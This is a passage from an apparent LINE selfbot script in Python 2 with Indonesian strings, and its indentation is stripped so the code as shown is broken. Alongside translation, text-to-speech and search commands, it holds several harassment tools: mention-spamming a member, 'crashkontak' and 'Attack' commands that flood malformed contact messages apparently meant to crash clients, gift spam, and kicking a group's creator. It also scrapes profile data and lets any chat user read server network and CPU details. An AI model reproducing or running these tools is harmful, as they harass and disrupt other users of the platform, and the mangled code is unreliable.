kr.sendText(msg.to,"----FROM TH----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif "Id@jp" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ja'
kata = msg.text.replace("Id@jp ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
kr.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO JP----\n" + "" + result + "\n------SUKSES-----")
elif "Id@ar" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ar'
kata = msg.text.replace("Id@ar ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
kr.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO AR----\n" + "" + result + "\n------SUKSES-----")
elif "Ar@id" in msg.text:
bahasa_awal = 'ar'
bahasa_tujuan = 'id'
kata = msg.text.replace("Ar@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
kr.sendText(msg.to,"----FROM AR----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif "Id@ko" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ko'
kata = msg.text.replace("Id@ko ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
kr.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO KO----\n" + "" + result + "\n------SUKSES-----")
elif "Ko@id" in msg.text:
bahasa_awal = 'ko'
bahasa_tujuan = 'id'
kata = msg.text.replace("Ko@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
kr.sendText(msg.to,"----FROM KO----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif msg.text.lower() == 'welcome':
ginfo = kr.getGroup(msg.to)
kr.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
jawaban1 = ("Selamat Datang Di Grup " + str(ginfo.name))
kr.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
tts = gTTS(text=jawaban1, lang='id')
tts.save('tts.mp3')
kr.sendAudio(msg.to,'tts.mp3')
elif "Say-id " in msg.text:
say = msg.text.replace("Say-id ","")
lang = 'id'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
kr.sendAudio(msg.to,"hasil.mp3")
elif "Say-en " in msg.text:
say = msg.text.replace("Say-en ","")
lang = 'en'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
kr.sendAudio(msg.to,"hasil.mp3")
elif "Say-jp " in msg.text:
say = msg.text.replace("Say-jp ","")
lang = 'ja'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
kr.sendAudio(msg.to,"hasil.mp3")
elif "Say-ar " in msg.text:
say = msg.text.replace("Say-ar ","")
lang = 'ar'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
kr.sendAudio(msg.to,"hasil.mp3")
elif "Say-ko " in msg.text:
say = msg.text.replace("Say-ko ","")
lang = 'ko'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
kr.sendAudio(msg.to,"hasil.mp3")
elif "Kapan " in msg.text:
tanya = msg.text.replace("Kapan ","")
jawab = ("kapan kapan","besok","satu abad lagi","Hari ini","Tahun depan","Minggu depan","Bulan depan","Sebentar lagi")
jawaban = random.choice(jawab)
tts = gTTS(text=jawaban, lang='id')
tts.save('tts.mp3')
kr.sendAudio(msg.to,'tts.mp3')
elif "Apakah " in msg.text:
tanya = msg.text.replace("Apakah ","")
jawab = ("Ya","Tidak","Mungkin","Bisa jadi")
jawaban = random.choice(jawab)
tts = gTTS(text=jawaban, lang='id')
tts.save('tts.mp3')
kr.sendAudio(msg.to,'tts.mp3')
elif 'Youtubemp4 ' in msg.text:
try:
textToSearch = (msg.text).replace('Youtubemp4 ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class': 'yt-uix-tile-link'})
ght = ('https://www.youtube.com' + results['href'])
kr.sendVideoWithURL(msg.to, ght)
except:
kr.sendText(msg.to, "Could not find it")
elif "Youtubesearch " in msg.text:
query = msg.text.replace("Youtube ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
hasil = ""
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list=' not in a['href']:
hasil += ''.join((a['title'],'\nUrl : http://www.youtube.com' + a['href'],'\n\n'))
kr.sendText(msg.to,hasil)
print '[Command] Youtube Search'
elif "Lirik " in msg.text:
try:
songname = msg.text.lower().replace("Lirik ","")
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Lyric Lagu ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
kr.sendText(msg.to, hasil)
except Exception as wak:
kr.sendText(msg.to, str(wak))
elif "Wikipedia " in msg.text:
try:
wiki = msg.text.lower().replace("Wikipedia ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
kr.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
kr.sendText(msg.to, pesan)
except Exception as e:
kr.sendText(msg.to, str(e))
elif "Music " in msg.text:
try:
songname = msg.text.lower().replace("Music ","")
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'This is Your Music\n'
hasil += 'Judul : ' + song[0]
hasil += '\nDurasi : ' + song[1]
hasil += '\nLink Download : ' + song[4]
kr.sendText(msg.to, hasil)
kr.sendText(msg.to, "Please Wait for audio...")
kr.sendAudioWithURL(msg.to, song[4])
except Exception as njer:
kr.sendText(msg.to, str(njer))
elif "Image " in msg.text:
search = msg.text.replace("Image ","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
print path
try:
kr.sendImageWithURL(msg.to,path)
except:
pass
elif "Profileig " in msg.text:
try:
instagram = msg.text.replace("Profileig ","")
response = requests.get("https://www.instagram.com/"+instagram+"?__a=1")
data = response.json()
namaIG = str(data['user']['full_name'])
bioIG = str(data['user']['biography'])
mediaIG = str(data['user']['media']['count'])
verifIG = str(data['user']['is_verified'])
usernameIG = str(data['user']['username'])
followerIG = str(data['user']['followed_by']['count'])
profileIG = data['user']['profile_pic_url_hd']
privateIG = str(data['user']['is_private'])
followIG = str(data['user']['follows']['count'])
link = "Link: " + "https://www.instagram.com/" + instagram
text = "Name : "+namaIG+"\nUsername : "+usernameIG+"\nBiography : "+bioIG+"\nFollower : "+followerIG+"\nFollowing : "+followIG+"\nPost : "+mediaIG+"\nVerified : "+verifIG+"\nPrivate : "+privateIG+"" "\n" + link
kr.sendImageWithURL(msg.to, profileIG)
kr.sendText(msg.to, str(text))
except Exception as e:
kr.sendText(msg.to, str(e))
elif "Checkdate " in msg.text:
tanggal = msg.text.replace("Checkdate ","")
r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
data=r.text
data=json.loads(data)
lahir = data["data"]["lahir"]
usia = data["data"]["usia"]
ultah = data["data"]["ultah"]
zodiak = data["data"]["zodiak"]
kr.sendText(msg.to,"============ I N F O R M A S I ============\n"+"Date Of Birth : "+lahir+"\nAge : "+usia+"\nUltah : "+ultah+"\nZodiak : "+zodiak+"\n============ I N F O R M A S I ============")
elif msg.text in ["Kalender","Time","Waktu"]:
timeNow = datetime.now()
timeHours = datetime.strftime(timeNow,"(%H:%M)")
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
inihari = datetime.today()
hr = inihari.strftime('%A')
bln = inihari.strftime('%m')
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
for k in range(0, len(bulan)):
if bln == str(k): bln = bulan[k-1]
rst = hasil + ", " + inihari.strftime('%d') + " - " + bln + " - " + inihari.strftime('%Y') + "\nJam : [ " + inihari.strftime('%H:%M:%S') + " ]"
kr.sendText(msg.to, rst)
#==============================================================================#
elif msg.text.lower() == 'ifconfig':
botKernel = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE).communicate()[0]
kr.sendText(msg.to, botKernel + "\n\n===SERVER INFO NetStat===")
elif msg.text.lower() == 'system':
botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0]
kr.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===")
elif msg.text.lower() == 'kernel':
botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0]
kr.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===")
elif msg.text.lower() == 'cpu':
botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0]
kr.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===")
elif "Restart" in msg.text:
print "[Command]Restart"
try:
kr.sendText(msg.to,"Restarting...")
kr.sendText(msg.to,"Restart Success")
restart_program()
except:
kr.sendText(msg.to,"Please wait")
restart_program()
pass
elif "Turn off" in msg.text:
try:
import sys
sys.exit()
except:
pass
elif msg.text.lower() == 'runtime':
eltime = time.time() - mulai
van = "Bot has been active "+waktu(eltime)
kr.sendText(msg.to,van)
#================================ KRIS SCRIPT STARTED ==============================================#
elif "google " in msg.text:
a = msg.text.replace("google ","")
b = urllib.quote(a)
kr.sendText(msg.to,"Sedang Mencari om...")
kr.sendText(msg.to, "https://www.google.com/" + b)
kr.sendText(msg.to,"Ketemu om ^")
elif cms(msg.text,["/creator","Creator"]):
msg.contentType = 13
msg.contentMetadata = {'mid': "u350cc7408cc6cc82e056ee046131f925"}
kr.sendMessage(msg)
elif "friendpp: " in msg.text:
if msg.from_ in admin:
suf = msg.text.replace('friendpp: ','')
gid = kr.getAllContactIds()
for i in gid:
h = kr.getContact(i).displayName
gna = kr.getContact(i)
if h == suf:
kr.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus)
elif "Checkmid: " in msg.text:
saya = msg.text.replace("Checkmid: ","")
msg.contentType = 13
msg.contentMetadata = {"mid":saya}
kr.sendMessage(msg)
contact = kr.getContact(saya)
cu = kr.channel.getCover(saya)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
kr.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
kr.sendText(msg.to,"Profile Picture " + contact.displayName)
kr.sendImageWithURL(msg.to,image)
kr.sendText(msg.to,"Cover " + contact.displayName)
kr.sendImageWithURL(msg.to,path)
except:
pass
elif "Checkid: " in msg.text:
saya = msg.text.replace("Checkid: ","")
gid = kr.getGroupIdsJoined()
for i in gid:
h = kr.getGroup(i).id
group = kr.getGroup(i)
if h == saya:
try:
creator = group.creator.mid
msg.contentType = 13
msg.contentMetadata = {'mid': creator}
md = "Nama Grup :\n" + group.name + "\n\nID Grup :\n" + group.id
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang"
kr.sendText(msg.to,md)
kr.sendMessage(msg)
kr.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ group.pictureStatus)
except:
creator = "Error"
elif msg.text in ["Friendlist"]:
contactlist = kr.getAllContactIds()
kontak = kr.getContacts(contactlist)
num=1
msgs="═════════List Friend═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Friend═════════\n\nTotal Friend : %i" % len(kontak)
kr.sendText(msg.to, msgs)
elif msg.text in ["Member list"]:
kontak = kr.getGroup(msg.to)
group = kontak.members
num=1
msgs="═════════List Member═════════-"
for ids in group:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Member═════════\n\nTotal Members : %i" % len(group)
kr.sendText(msg.to, msgs)
elif "Friendinfo: " in msg.text:
saya = msg.text.replace('Friendinfo: ','')
gid = kr.getAllContactIds()
for i in gid:
h = kr.getContact(i).displayName
contact = kr.getContact(i)
cu = kr.channel.getCover(i)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
if h == saya:
kr.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
kr.sendText(msg.to,"Profile Picture " + contact.displayName)
kr.sendImageWithURL(msg.to,image)
kr.sendText(msg.to,"Cover " + contact.displayName)
kr.sendImageWithURL(msg.to,path)
elif "Friendpict: " in msg.text:
saya = msg.text.replace('Friendpict: ','')
gid = kr.getAllContactIds()
for i in gid:
h = kr.getContact(i).displayName
gna = kr.getContact(i)
if h == saya:
kr.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus)
elif msg.text in ["Friendlistmid"]:
gruplist = kr.getAllContactIds()
kontak = kr.getContacts(gruplist)
num=1
msgs="═════════ʆίςϯ ƒɾίεηδʍίδ═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.mid)
num=(num+1)
msgs+="\n═════════ʆίςϯ ƒɾίεηδʍίδ═════════\n\nTotal Friend : %i" % len(kontak)
kr.sendText(msg.to, msgs)
elif msg.text in ["Blocklist"]:
blockedlist = kr.getBlockedContactIds()
kontak = kr.getContacts(blockedlist)
num=1
msgs="═════════List Blocked═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Blocked═════════\n\nTotal Blocked : %i" % len(kontak)
kr.sendText(msg.to, msgs)
elif msg.text in ["Gruplist"]:
gruplist = kr.getGroupIdsJoined()
kontak = kr.getGroups(gruplist)
num=1
msgs="═════════List Grup═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.name)
num=(num+1)
msgs+="\n═════════List Grup═════════\n\nTotal Grup : %i" % len(kontak)
kr.sendText(msg.to, msgs)
elif msg.text in ["Gruplistmid"]:
gruplist = kr.getGroupIdsJoined()
kontak = kr.getGroups(gruplist)
num=1
msgs="═════════List GrupMid═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.id)
num=(num+1)
msgs+="\n═════════List GrupMid═════════\n\nTotal Grup : %i" % len(kontak)
kr.sendText(msg.to, msgs)
elif "Grupimage: " in msg.text:
saya = msg.text.replace('Grupimage: ','')
gid = kr.getGroupIdsJoined()
for i in gid:
h = kr.getGroup(i).name
gna = kr.getGroup(i)
if h == saya:
kr.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus)
elif "Grupname" in msg.text:
saya = msg.text.replace('Grupname','')
gid = kr.getGroup(msg.to)
kr.sendText(msg.to, "[Nama Grup : ]\n" + gid.name)
elif "Grupid" in msg.text:
saya = msg.text.replace('Grupid','')
gid = kr.getGroup(msg.to)
kr.sendText(msg.to, "[ID Grup : ]\n" + gid.id)
elif "Grupinfo: " in msg.text:
saya = msg.text.replace('Grupinfo: ','')
gid = kr.getGroupIdsJoined()
for i in gid:
h = kr.getGroup(i).name
group = kr.getGroup(i)
if h == saya:
try:
creator = group.creator.mid
msg.contentType = 13
msg.contentMetadata = {'mid': creator}
md = "Nama Grup :\n" + group.name + "\n\nID Grup :\n" + group.id
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang"
kr.sendText(msg.to,md)
kr.sendMessage(msg)
kr.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ group.pictureStatus)
except:
creator = "Error"
elif "Spamtag @" in msg.text:
_name = msg.text.replace("Spamtag @","")
_nametarget = _name.rstrip(' ')
gs = kr.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
xname = g.displayName
xlen = str(len(xname)+1)
msg.contentType = 0
msg.text = "@"+xname+" "
msg.contentMetadata ={'MENTION':'{"MENTIONEES":[{"S":"0","E":'+json.dumps(xlen)+',"M":'+json.dumps(g.mid)+'}]}','EMTVER':'4'}
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
print "Spamtag Berhasil."
elif "crashkontak @" in msg.text:
_name = msg.text.replace("crashkontak @","")
_nametarget = _name.rstrip(' ')
gs = kr.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentType = 13
msg.contentMetadata = {'mid': "u350cc7408cc6cc82e056ee046131f925',"}
kr.sendMessage(g.mid,msg.to + str(msg))
kr.sendText(g.mid, "hai")
kr.sendText(g.mid, "salken")
kr.sendText(msg.to, "Done")
print " Spammed crash !"
elif "playstore " in msg.text.lower():
tob = msg.text.lower().replace("playstore ","")
kr.sendText(msg.to,"Sedang Mencari boss...")
kr.sendText(msg.to,"Title : "+tob+"\nSource : Google Play\nLinknya : https://play.google.com/store/search?q=" + tob)
kr.sendText(msg.to,"Ketemu boss ^")
elif 'wikipedia ' in msg.text.lower():
try:
wiki = msg.text.lower().replace("wikipedia ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=3)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
kr.sendText(msg.to, pesan)
except:
try:
pesan="Teks nya kepanjangan! ketik link dibawah aja\n"
pesan+=wikipedia.page(wiki).url
kr.sendText(msg.to, pesan)
except Exception as e:
kr.sendText(msg.to, str(e))
elif "say " in msg.text.lower():
say = msg.text.lower().replace("say ","")
lang = 'id'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
kr.sendAudio(msg.to,"hasil.mp3")
elif msg.text in ["spam gift 25"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'ae3d9165-fab2-4e70-859b-c14a9d4137c4',
'PRDTYPE': 'THEME',
'MSGTPL': '8'}
msg.text = None
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
elif msg.text in ["Gcreator:inv"]:
if msg.from_ in admin:
ginfo = kr.getGroup(msg.to)
gCreator = ginfo.creator.mid
try:
kr.findAndAddContactsByMid(gCreator)
kr.inviteIntoGroup(msg.to,[gCreator])
print "success inv gCreator"
except:
pass
elif msg.text in ["Gcreator:kick"]:
if msg.from_ in admin:
ginfo = kr.getGroup(msg.to)
gCreator = ginfo.creator.mid
try:
kr.findAndAddContactsByMid(gCreator)
kr.kickoutFromGroup(msg.to,[gCreator])
print "success inv gCreator"
except:
pass
elif 'lirik ' in msg.text.lower():
try:
songname = msg.text.lower().replace('lirik ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Lyric Lagu ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
kr.sendText(msg.to, hasil)
except Exception as wak:
kr.sendText(msg.to, str(wak))
elif "Getcover @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Getcover @","")
_nametarget = _name.rstrip(' ')
gs = kr.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = kr.getContact(target)
cu = kr.channel.getCover(target)
path = str(cu)
kr.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "idline: " in msg.text:
msgg = msg.text.replace('idline: ','')
conn = kr.findContactsByUserid(msgg)
if True:
msg.contentType = 13
msg.contentMetadata = {'mid': conn.mid}
kr.sendText(msg.to,"http://line.me/ti/p/~" + msgg)
kr.sendMessage(msg)
elif "reinvite" in msg.text.split():
if msg.toType == 2:
group = kr.getGroup(msg.to)
if group.invitee is not None:
try:
grCans = [contact.mid for contact in group.invitee]
kr.findAndAddContactByMid(msg.to, grCans)
kr.cancelGroupInvitation(msg.to, grCans)
kr.inviteIntoGroup(msg.to, grCans)
except Exception as error:
print error
else:
if wait["lang"] == "JP":
kr.sendText(msg.to,"No Invited")
else:
kr.sendText(msg.to,"Error")
else:
pass
elif msg.text.lower() == 'runtime':
eltime = time.time() - mulai
van = "Bot sudah berjalan selama "+waktu(eltime)
kr.sendText(msg.to,van)
elif msg.text in ["Restart"]:
kr.sendText(msg.to, "Bot has been restarted")
restart_program()
print "@Restart"
elif msg.text in ["time"]:
timeNow = datetime.now()
timeHours = datetime.strftime(timeNow,"(%H:%M)")
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
inihari = datetime.today()
hr = inihari.strftime('%A')
bln = inihari.strftime('%m')
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
for k in range(0, len(bulan)):
if bln == str(k): bln = bulan[k-1]
rst = hasil + ", " + inihari.strftime('%d') + " - " + bln + " - " + inihari.strftime('%Y') + "\nJam : [ " + inihari.strftime('%H:%M:%S') + " ]"
client.sendText(msg.to, rst)
elif "image " in msg.text:
search = msg.text.replace("image ","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
print path
try:
kr.sendImageWithURL(msg.to,path)
except:
pass
elif 'instagram ' in msg.text.lower():
try:
instagram = msg.text.lower().replace("instagram ","")
html = requests.get('https://www.instagram.com/' + instagram + '/?')
soup = BeautifulSoup(html.text, 'html5lib')
data = soup.find_all('meta', attrs={'property':'og:description'})
text = data[0].get('content').split()
data1 = soup.find_all('meta', attrs={'property':'og:image'})
text1 = data1[0].get('content').split()
user = "Name: " + text[-2] + "\n"
user1 = "Username: " + text[-1] + "\n"
followers = "Followers: " + text[0] + "\n"
following = "Following: " + text[2] + "\n"
post = "Post: " + text[4] + "\n"
link = "Link: " + "https://www.instagram.com/" + instagram
detail = "**INSTAGRAM INFO USER**\n"
details = "\n**INSTAGRAM INFO USER**"
kr.sendText(msg.to, detail + user + user1 + followers + following + post + link + details)
kr.sendImageWithURL(msg.to, text1[0])
except Exception as njer:
kr.sendText(msg.to, str(njer))
elif msg.text in ["Attack"]:
msg.contentType = 13
msg.contentMetadata = {'mid': "u350cc7408cc6cc82e056ee046131f925',"}
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
elif msg.text.lower() == '...':
msg.contentType = 13
msg.contentMetadata = {'mid': "u350cc7408cc6cc82e056ee046131f925',"}
kr.sendMessage(msg)
#=================================KRIS SCRIPT FINISHED =============================================#
elif "Ban @" in msg.text:
if msg.toType == 2:
_name = msg.text.replace("Ban @","")
_nametarget = _name.rstrip()
gs = kr.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kr.sendText(msg.to,_nametarget + " Not Found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
kr.sendText(msg.to,_nametarget + " Succes Add to Blacklist")
except:
kr.sendText(msg.to,"Error")
elif "Unban @" in msg.text:
if msg.toType == 2:
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip()
gs = kr.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kr.sendText(msg.to,_nametarget + " Not Found")
else:
for target in targets:
try:
del wait["blacklist"][target]
kr.sendText(msg.to,_nametarget + " Delete From Blacklist")
except:
kr.sendText(msg.to,_nametarget + " Not In Blacklist")
elif "Ban:" in msg.text:
nk0 = msg.text.replace("Ban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = kr.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
kr.sendText(msg.to,_name + " Succes Add to Blacklist")
except:
kr.sendText(msg.to,"Error")
elif "Unban:" in msg.text:
nk0 = msg.text.replace("Unban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = kr.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
kr.sendText(msg.to,_name + " Delete From Blacklist")
except:
kr.sendText(msg.to,_name + " Not In Blacklist")
elif msg.text in ["Clear"]:
wait["blacklist"] = {}
kr.sendText(msg.to,"Blacklist Telah Dibersihkan")
elif msg.text in ["Ban:on"]:
wait["wblacklist"] = True
kr.sendText(msg.to,"Send Contact")
elif msg.text in ["Unban:on"]:
wait["dblacklist"] = True
kr.sendText(msg.to,"Send Contact")
elif msg.text in ["Banlist"]:
if wait["blacklist"] == {}:
kr.sendText(msg.to,"Tidak Ada Blacklist")
else:
kr.sendText(msg.to,"Daftar Banlist")
num=1
msgs="*Blacklist*"
for mi_d in wait["blacklist"]:
msgs+="\n[%i] %s" % (num, kr.getContact(mi_d).displayName)
num=(num+1)
msgs+="\n*Blacklist*\n\nTotal Blacklist : %i" % len(wait["blacklist"])
kr.sendText(msg.to, msgs)
elif msg.text in ["Conban","Contactban","Contact ban"]:
if wait["blacklist"] == {}:
kr.sendText(msg.to,"Tidak Ada Blacklist")
else:
